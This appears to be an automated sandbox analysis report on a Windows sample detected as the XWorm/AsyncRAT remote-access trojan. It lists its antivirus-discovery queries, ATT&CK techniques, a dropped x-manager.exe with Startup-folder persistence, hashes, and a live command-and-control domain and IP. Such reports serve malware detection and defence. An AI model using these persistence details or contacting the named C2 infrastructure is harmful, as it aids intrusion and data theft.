                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.c50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe PID: 5224, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\x-manager.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.c50000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe PID: 5224, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\x-manager.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation                  		2
                  Registry Run Keys / Startup Folder                  		2
                  Registry Run Keys / Startup Folder                  		1
                  Masquerading                  		1
                  Input Capture                  		221
                  Security Software Discovery                  		Remote Services1
                  Input Capture                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop Protocol11
                  Archive Collected Data                  		1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
                  Virtualization/Sandbox Evasion                  		Security Account Manager131
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture11
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Software Packing                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials13
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe84%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                  17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe100%AviraTR/Spy.Gen
                  17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\x-manager.exe100%AviraTR/Spy.Gen
                  C:\Users\user\AppData\Roaming\x-manager.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\x-manager.exe84%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  browser-hazard.gl.at.ply.gg
                  		147.185.221.23
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    browser-hazard.gl.at.ply.ggtrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4107271743.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      147.185.221.23
                      		browser-hazard.gl.at.ply.ggUnited States
                      		12087SALSGIVERUStrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1546912
                      Start date and time:2024-11-01 17:30:05 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 32s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:6
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@1/3@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 5
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      12:31:04API Interceptor13114924x Sleep call for process: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe modified
                      16:31:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x-manager.lnk

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      147.185.221.23r8gcHFIf3x.exeGet hashmaliciousXWormBrowse
                        0eVxwphG1t.exeGet hashmaliciousXWormBrowse
                          9RgE5uOJwX.exeGet hashmaliciousXWormBrowse
                            rustdesk.exeGet hashmaliciousXWormBrowse
                              q0SpP6HxtE.exeGet hashmaliciousXWormBrowse
                                mkDhqaw9dx.exeGet hashmaliciousXWormBrowse
                                  R7iHtCsOYz.exeGet hashmaliciousXWormBrowse
                                    Zvas34nq1T.exeGet hashmaliciousXWormBrowse
                                      fMdcaIZWzT.exeGet hashmaliciousXWormBrowse
                                        vtuLkV5KEW.exeGet hashmaliciousXWormBrowse

                                          Domains

                                          No context

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          SALSGIVERUSr8gcHFIf3x.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.23
                                          0eVxwphG1t.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.23
                                          9RgE5uOJwX.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.23
                                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                          • 147.176.169.71
                                          rustdesk.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.23
                                          Nurcraft.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.21
                                          q0SpP6HxtE.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.23
                                          7bZWBYVNPU.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.22
                                          mkDhqaw9dx.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.23
                                          R7iHtCsOYz.exeGet hashmaliciousXWormBrowse
                                          • 147.185.221.23

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\Log.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):29
                                          Entropy (8bit):3.598349098128234
                                          Encrypted:false
                                          SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                          MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                          SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                          SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                          SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:....### explorer ###..[WIN]r

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x-manager.lnk

                                          Download File
                                          Process:C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 1 15:30:59 2024, mtime=Fri Nov 1 15:30:59 2024, atime=Fri Nov 1 15:30:59 2024, length=154624, window=hide
                                          Category:dropped
                                          Size (bytes):776
                                          Entropy (8bit):5.035356313092386
                                          Encrypted:false
                                          SSDEEP:12:8DWCI4wFiWCSgdY//s9klLxgmu8YZOjALrH/qX4idBmV:8KOW94+k9Q4JIALDqX4idBm
                                          MD5:C73ED24D6B6E83BDA634185D7FA7DB7F
                                          SHA1:8306605EB56F805EAE73D26CABF1988D7739F942
                                          SHA-256:33E940C884460F9C11F9B8FECBC820D14066A7E3D587B2DCE56F6BCE1DB6B65E
                                          SHA-512:4B18A9A05400774837761F00AE9A52CCC220C5C195C4E6CDE681CC6FFF415B6B971B272D22286CE17019BE0E5A762E12EA84D1AF4866C5BD31AAECD498FF21B1
                                          Malicious:false
                                          Reputation:low
                                          Preview:L..................F.... ...U.Yo{,..U.Yo{,..U.Yo{,...\......................|.:..DG..Yr?.D..U..k0.&...&......vk.v.....Nuh{,...6vo{,......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^aY............................%..A.p.p.D.a.t.a...B.V.1.....aY...Roaming.@......CW.^aY............................$..R.o.a.m.i.n.g.....h.2..\..aY.. .X-MANA~1.EXE..L......aY..aY................................x.-.m.a.n.a.g.e.r...e.x.e.......[...............-.......Z............556.....C:\Users\user\AppData\Roaming\x-manager.exe........\.....\.....\.....\.....\.x.-.m.a.n.a.g.e.r...e.x.e.`.......X.......562258...........hT..CrF.f4... .}T..b...,.......hT..CrF.f4... .}T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                          C:\Users\user\AppData\Roaming\x-manager.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):154624
                                          Entropy (8bit):6.043231723341007
                                          Encrypted:false
                                          SSDEEP:3072:wxqxFiFO9W2OMJ4NpVq8BxFRzaqF+o2GQJ7/JzqVfGvO:wxqiO9BgVqwlL
                                          MD5:FB84F0C948174966776DB1E4592FDC75
                                          SHA1:178B6CE2DDD9DE88D5E6B39C212254B50D45CFD7
                                          SHA-256:58E5F9CAA04676B6269B870CC4AA3997287FD3A038D1DF59E5BD2C41B75BBD62
                                          SHA-512:22874247132885D150E12D2E649690C296EF40EAA85F69CA90A9207CE1CE56C1FFEF488875936166F18E9F5FFB06AEB4A4FE6EDF01B0DCD9D6A64B43A6C36114
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\x-manager.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\x-manager.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 84%
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Di.f............................n.... ........@.. ....................................@.....................................O.......T............................................................................ ............... ..H............text...t.... ...................... ..`.rsrc...T...........................@..@.reloc...............Z..............@..B................P.......H........W..$U............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):6.043231723341007
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                                          File size:154'624 bytes
                                          MD5:fb84f0c948174966776db1e4592fdc75
                                          SHA1:178b6ce2ddd9de88d5e6b39c212254b50d45cfd7
                                          SHA256:58e5f9caa04676b6269b870cc4aa3997287fd3a038d1df59e5bd2c41b75bbd62
                                          SHA512:22874247132885d150e12d2e649690c296ef40eaa85f69ca90a9207ce1ce56c1ffef488875936166f18e9f5ffb06aeb4a4fe6edf01b0dcd9d6a64b43a6c36114
                                          SSDEEP:3072:wxqxFiFO9W2OMJ4NpVq8BxFRzaqF+o2GQJ7/JzqVfGvO:wxqiO9BgVqwlL
                                          TLSH:4FE3A2698EEBB242C54A54747D7363824B395F79A4CF75158EE33FAE1BB3C9410230A2
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Di.f............................n.... ........@.. ....................................@................................

                                          File Icon

                                          Icon Hash:073149cccc490307

                                          Static PE Info

                                          General

                                          Entrypoint:0x40ad6e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x66FD6944 [Wed Oct 2 15:39:48 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xad1c0x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x1c954.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x8d740x8e005b79fcef0f076d0d5a575f4bb32d2841False0.49942231514084506data5.728970562657005IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xc0000x1c9540x1ca00692918a80109b1f62c5223d3b9869eb6False0.2493773881004367data5.818572371473846IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x2a0000xc0x200bad233d3fe1f2b72973dfc5b47cb596bFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xc2200x3da8PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9980993411049164
                                          RT_ICON0xffc80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.08706967940376198
                                          RT_ICON0x207f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.16963863958431744
                                          RT_ICON0x24a180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.22697095435684647
                                          RT_ICON0x26fc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.3351313320825516
                                          RT_ICON0x280680x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.5904255319148937
                                          RT_GROUP_ICON0x284d00x5adata0.7222222222222222
                                          RT_VERSION0x2852c0x23cdata0.4755244755244755
                                          RT_MANIFEST0x287680x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-11-01T17:31:15.782631+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449731TCP
                                          2024-11-01T17:31:55.570005+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449742TCP
